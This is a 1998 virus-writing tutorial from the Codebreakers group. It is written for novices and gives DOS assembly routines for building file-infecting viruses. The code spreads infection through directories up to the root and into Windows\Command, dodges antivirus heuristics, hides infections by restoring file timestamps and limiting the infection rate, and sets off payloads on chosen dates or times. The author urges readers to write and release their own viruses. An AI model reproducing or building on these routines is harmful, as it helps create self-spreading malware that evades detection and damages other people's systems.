home *** CD-ROM | disk | FTP | other *** search
/ HPAVC / HPAVC CD-ROM.iso / pc / CODBRK3.ZIP / cb0207.txt < prev    next >
Encoding:
Text File  |  1998-03-25  |  15.8 KB  |  346 lines
  1.                        Virus "Add-Ons" Tutorial
  2.                       by Opic [Codebreakers,1998]
  3.  
  4.    Let me first say that this tutorial is directed at the newbie, and not for
  5. experienced coders. That being said this tutorial is to aid you in coding
  6. the "features" of your virus. Which, when you think about it, is pretty
  7. fucking important! (please note that I will not be dealing with encryption or
  8. the main virus body as Sea4 and Horny Toad have already covered these)It is 
  9. one of the only things that makes your virus unique. So throughout this 
  10. tutorial remember that you should not be cutting and pasting code here, I 
  11. want you to take the example I give you and expand upon them, make them 
  12. better or code them in a new way; in other words make it interesting and be
  13.  creative (why else might you code virii anyways?). The article is divided 
  14. into two sections: the first will be on techniques that are utilitary in 
  15. nature (they will add features to how the virus functions), the second will
  16.  be on payload and payload activation ideas and techniques. 
  17.    
  18. SECTION 1.
  19.  
  20. CHANGING DIRECTORYS
  21.    
  22.    Ok, the first technique I will show you is the simple DotDot method of
  23. changing directories. This allows your runtime infecting virus to infect from
  24. its starting directory all the way up to root infecting each directory and 
  25. its first subdirectory. We plug this into our virus by modifying our find-first
  26. routine to jump to our DotDot routine, I'll include the minor change in code so
  27. that it is blindingly clear to you what I mean. Here is the the DotDot routine
  28. with our slightly modified find first:
  29.  
  30. find_first:
  31.         mov ah,4eh            ;find's first file in the starting directory
  32.         lea dx,[bp+filespec]  ;loads type of file we are looking for in dx 
  33.         int 21h               ;go dos!
  34.         jnc open              ;found one! go to open and infect routine
  35.                               ;it should be noted that the findnext command
  36.                               ;should be somewhere in end of this routine
  37.         jmp DotDot            ;otherwise change directory
  38.  
  39. DotDot:                       ;this is the dot dot routine
  40.         lea dx,[bp+dotdot]    ;load dotdot from datasegment
  41.         mov ah, 3Bh           ;int for "chdir" set current directory
  42.         int 21h               ;do it! 
  43.         jnc find_first        ;find first file in new directory
  44.         jmp exit_stage_left   ;we hit root and have now have max file
  45.                               ;infection (well max for this method)
  46. dotdot            db  '..',0
  47.  
  48. understand? hopefully you do :)  basically instead of exiting after 
  49. infecting just one dir we change to the next one infect it and its first
  50. subdir and so on until we hit root, then exit. Likewise we can use 3Bh
  51. to infect (or do anything we like to) a certain directory or subdirectory.
  52. I'm sure you can all think of a directory alot of people have and you would
  53. like to infect :) Well if you cant then don't worry, I've got your back
  54. covered on this one: how 'bout Windows\Command? here's an example of how to 
  55. change directories to a specific directory:
  56.  
  57. windoze:
  58.       mov ah,3bh                  ;int to "chdir" set current directory
  59.       lea dx,winspec              ;load windows location
  60.       int 21h                     ;go dos go!
  61.       jnc find_first              ;find first file to infect
  62.       jmp exit_stage_left         ;done with doze? lets bring it on home! 
  63.  
  64. winspec   db 'C:\windows\command',0  
  65.  
  66. No big change right? Good! Enough said, you can use the DotDot routine in 
  67. combination with infecting specific directories which are likely to be present
  68. on most systems to get a wider infection rate. Also consider other directories
  69. which you may want to "modify" (such as your favorite AV scanner etc.).
  70.  
  71. SIMPLE ANTI-HEURISTICS LOOP
  72.  
  73.    The next technique I'd like to show you is a simple loop to kill some
  74. heuristic scanners. This can be effective when paired with encryption,
  75. but doesn't perform well as a single measure against AV scanners.This one
  76. should be pretty self explanatory so I wont say much about it other then
  77. you should place it at the beginning of your virus ;)
  78.    
  79.    mov cx,0ffffh         ;should look familiar from other antiheurist loops
  80. AH1:                     ;anti-Heur1 label
  81.    jmp AH2               ;jump AH2
  82.    mov ax,4c00h          ;function 4ch: "exit" terminate with return code
  83.    int 21h               ;go dos!
  84.  
  85. AH2:                     ;anti-huer2 label
  86.    loop AH1              ;loop AH1
  87.  
  88. Not much else I can say about this one except credits go to spo0ky for 
  89. resurrecting this old technique and giving it a makeover ;)
  90.  
  91. RESTORING TIME/DATE STAMPS
  92.  
  93.    Want to make your virus a little less noticeable? It looks awfully strange 
  94. when all the infected files have the same time/date stamp doesnt it? Well
  95. its a very simple procedure to save the time/date stamps and restore them
  96. after infecting the file. Heres how simple it really is:
  97.  
  98. Get Time/Date stamps:
  99. This should be done after you open the file but BEFORE you infect or modify
  100. the file in any way.
  101.                  
  102. mov ax,5700h                   ;get files time/date stamp
  103. int 21h                        ;now!
  104. push dx                        ;save the values
  105. push cx                        ;in dx and cx
  106.  
  107. Restore Time/Date stamps:
  108. This should be done right before you close the file.
  109.  
  110. mov ax,5701h                      ;restore files time/date stamp
  111.       pop dx                      ;from
  112.       pop cx                      ;dx and cx
  113.       int 21h                     ;now!
  114.  
  115. CONTROLING RATE OF INFECTION
  116.  
  117. Too much of a good thing can be bad right? Same goes for infecting files,
  118. we want to infect as many of them as we can but we may not want to do it all
  119. at one time as it may appear suspicious to the user that all his files have
  120. suddenly grown by however many bytes your virus is. So lets take our time
  121. and infect only so many files per run, the way we do this is via a infection
  122. counter. The counter is a pretty versatile thing, we can use it for whatever
  123. we want (example: we could also use it as a payload activation; payload 
  124. activates ever 15 runs or whatever) just use your imagination. At any rate
  125. we will use it as a counter in this example which infects 10 files per run.
  126.  
  127.       inc byte ptr [counter]      ;add one to our counter
  128.       cmp byte ptr [counter],10   ;10 infections?
  129.       je Clear                    ;we hit 10? clear counter and exit!
  130. Clear:
  131.       mov byte ptr [counter],0    ;clears infection counter
  132.       jmp exit_stage_left         ;and get outta here! 
  133.  
  134. counter   db 0     
  135.  
  136. The counter portion of the example should be placed at the end of your 
  137. infection routine, after you close the infected file. The "Clear" routine
  138. should lie somewhere outside of the exit code so it is not executed
  139. when it shouldn't be.
  140.  
  141. CHECKING VICTUM FILE SIZE
  142.  
  143. Heres one of many ways you can check the victims filesize to see if it should
  144. be infected. files that are too large should not be infected as they will
  145. corrupt due to the change in size your virus makes(an good example is    
  146. command.com which is not a "real" .com per say and can corrupt if more bytes
  147. are added) Files too small should be avoided due to obvious reasons. This code 
  148. would be placed somewhere after we open the file and get file info. In this
  149. example we are checking to see if the file is bigger the 4000 bytes or 
  150. smaller then 40 (purely random numbers to illustrate the method, I dont 
  151. recommend you use these particular figures for your standard size check ;)
  152.  
  153. cmp word ptr 1ah,4000                   ;compare size with 4000
  154. jna small                               ;ok not too big, too small?
  155. jmp find_next                           ;its too big! find next file
  156.  
  157. small:                                  ;lets see if its too small now
  158. cmp word ptr 1ah,40                     ;compare size with 40
  159. jnb continue                            ;if bigger then 40 we are ok :) 
  160. jmp find_next
  161.  
  162. continue:                               ;skip the find_next jump and we
  163.                                         ;proceed with infection.....
  164. SECTION 2.
  165.  
  166. PAYLOADS AND PAYLOAD CRITERIA
  167.  
  168.    This is the portion of your virus in which you should make it as unique 
  169. and interesting as possible. Not only to hone your creative mentality but
  170. also to make your virus noticed After all there are thousands of virii
  171. out there and the majority of them dont do ANYTHING interesting! And as a 
  172. consequence they are thrown into AV programs as Virus.874 (if they even
  173. make it into a scanners library) simply because your virus did not have 
  174. many unique aspects which makes it interesting for the AV researcher to
  175. investigate.So make it interesting and challenging and meanwhile you will
  176. be making a name for yourself :) And remember that this is the only part
  177. of your virus that the viewing audience will actually be able to see and
  178. possibly even appreciate (or despise). 
  179.    As for my opinion on destructive payloads; 
  180. I am not in favor of them, so if you want to learn how to format
  181. a disk then go look for another tutorial. Destructive payloads have for
  182. starters been done to death! Peoples hard drives have been fucked up by
  183. virii in just about every way imaginable and its not all that impressive,
  184. and its VERY easy to code(it takes 5 lines of code to format a disk)and 
  185. thus shows little ability on your part. But if you are dead set on making 
  186. a destructive payload I urge you to make it something which will alter the 
  187. system without destroying personal data, and one that is easily fixed (such
  188.  as hindering windows by removing the Windows\System dir which kills windows
  189.  but can be fixed by replacing the dir from the users Windows CD or whatever).
  190.  OK, enough about that.
  191.  
  192. Payload Criteria
  193.     
  194.    There is an infinite number of activation routines. I obviously won't cover
  195. them all but will show you a few common ones which you can incorporate and
  196. adjust in your virii.
  197.  
  198. Date activation:
  199.    This is a very common way that virii activate. Heres how it breaks down:
  200. we check the system date with int 21/2a, our returns we will want to compare
  201. with are as follows:
  202.  
  203. CX=year (1980-2099)
  204. DH=month
  205. DL=day
  206. AL=day of week (00h=sunday) 
  207. simple huh? Ill provide a few examples to be sure you understand.
  208.  
  209. Want to activate your virus only on Mondays?
  210.  
  211. mov ah,2ah                 ;gets system date
  212. int 21h                    ;get it 
  213. cmp al,001h                ;compares, is it monday?
  214.                            ;if you hadn't already guessed:
  215.                            ;001h=Mon 002h=Tue 003h=Wed, and so on...
  216. je payload                 ;if so, run the payload
  217. jmp exit_stage_left        ;if not then we exit
  218.  
  219. Want your payload active on the 15th of every month?
  220.  
  221. mov ah,2ah                 ;get system date
  222. int 21h                    ;go
  223. cmp dl,15                  ;is it the 15th?
  224. je payload                 ;yes? lets do it!
  225. jmp exit_stage_left        ;no? outta here
  226.  
  227.    Ok, but what about seconds and minutes you say? easy enough,
  228. Lets say you wanted your payload to go off at 30 minutes when the 
  229. seconds are less then 40:
  230.  
  231. mov ah,2Ch                 ;checks internal clock 
  232. int 21h                    ;go
  233. cmp cl,30d                 ;is the time 30 minutes?
  234. jne exit_stage_left        ;no? outta here
  235. cmp dh,40d                 ;are the seconds less then 40?
  236. jb payload                 ;yes? payload please!
  237. jmp exit_stage_left        ;no? outta here!
  238.  
  239.    Alright, thats enough about time/date activation. Another common payload 
  240. activation routine is based upon infection count ie: the payload is activated
  241. every certain number of infections. This is quite easily done via another 
  242. counter (please see CONTROLING RATE OF INFECTION for code).
  243.    You can also mix these two method for a more random payload activation,
  244. such as after 15 files have been infected checking if the seconds are less
  245. then 20 to activate your payload, giving your payload a seemingly random
  246. occurence rate. Play with these techniques and explore new ones of your own.
  247.  
  248. Payloads:
  249.  
  250.   Im obviously not going to show you full payloads to incorporate into your
  251. virii but rather I will give you useful ideas and techniques for you to 
  252. incorporate into your payloads. Remember this is your window of opportunity
  253. to do or say anything you want to the people who experience your virus, so
  254. I urge you to make it good! please dont write some lame payload that makes
  255. virii writers look like children writing with crayons on the wall ;) Be
  256. poetic or artistic or political, or anything besides then lame, childish and 
  257. egotistical. And remember the more impressive and interesting your payloads
  258. are, the more your virus will be noticed.
  259.  
  260. Displaying a message to the screen:
  261.  
  262. This is a pretty basic thing you should know.
  263.  
  264. mov ah,9h         ;print string to standard output
  265. lea dx,message    ;get message from data segment
  266. int 21h           ;do it!
  267.  
  268. message  db 'Daytime drives and drives afternoon taxi accident,',10,13,
  269.          db 'lunchtime. Rich in flavor, heavy, slow sunshines ',10,13,   
  270.          db 'iron into iodine.',10,13,
  271.          db '',10,13
  272.          db 'Suriv, coded and copywrited:Opic,[codebreakers,98]',10,13,'$'
  273.  
  274. How about printing something out of the printer?
  275.  
  276.  mov ah,01h         ;begin of printer payload
  277.  mov dx,0h          ;put 0h in dx
  278.  int 17h            ;int for initializing printer
  279.  lea si,string1     ;load string1 to si
  280.  mov cx,String1Len  ;move string1len to cx
  281. PrintStr:           ;label fer printing our message
  282.  mov ah,00h         ;write characters
  283.  lodsb              ;you know right :)
  284.  int 17h            ;printer int
  285.  loop PrintStr      ;loop printstr till we are done
  286.  
  287. String1Len        EQU EndStr1-String1
  288. String1     db  'Vive la difference!',0dh,0ah
  289.             db  'Suriv, coded and copywrited:Opic,[codebreakers,98]',0ch
  290. EndStr1:
  291.  
  292.  
  293. Graphics:
  294.  
  295. O.K, let me start by saying that programming graphics in ASM is pretty
  296. goddamn difficult in my opinion. And Im NOT going to show you how to
  297. do alot with graphics right now (this is a virus tut not a graphics
  298. one right?) But I will show you some code to give you an idea of how
  299. graphics in ASM work. Heres a bit of code that will create a blue pixel
  300. in the center of your screen.
  301.  
  302.  mov ax,13          ;sets mode 13h
  303.  int 10h            ;int 10=video int
  304.  mov ah,0ch         ;fuct 0Ch (look it up, you have the R.browns right?)
  305.  mov al,17          ;color 17=blue
  306.  mov cx,160         ;x axis position 160 (center)
  307.  mov dx,100         ;y axis position 100 (center)
  308.  int 10h            ;thats it 
  309.  
  310. Remember this is just the tip of the iceberg, creating good graphics in
  311. ASM shows a tremendous amount of skill and patience, and is sure to dazzle
  312. your audience :)
  313.  
  314.    Heres a few other neat little things you could do if you wanted to be a 
  315. bit more subtle.
  316.  
  317. Changing the date:
  318.  
  319. mov ah,2bh  ;set system date
  320. mov cx,2001 ;change year to 2001
  321. int 21h     ;go!
  322.             ;Im sure you know how to change it to a specific day by 
  323.             ;yourself, right?
  324.  
  325. Create a new subdirectory:
  326.  
  327.    I think this one is kind of fun, just create a new subdirectory which you
  328. could place on the desktop :)
  329.  
  330. mov ah,39h      ;create new subdir
  331. lea dx,dirname  ;with the name of...
  332. int 21h         ;go!
  333.  
  334. dirname db 'Hello_user!',0
  335.  
  336.   This should get you well on your way to writing more sophisticated
  337. and interesting virii. Take the time and energy to make interesting code and
  338. you will enjoy yourself that much more. Take the time to learn how to write
  339. songs and graphics in asm if you are so inclined, they are challenging and
  340. will improve your coding abilities. You could consider your virii "living
  341. works of art" dont cheat them by writing a great virus with a half-assed
  342. payload or visa versa. And above all enjoy whatever it is you create. That's
  343. all for now.                   
  344.                                - Opic [Codebreakers,98]
  345.                          email:  opic@thepentagon.com
  346.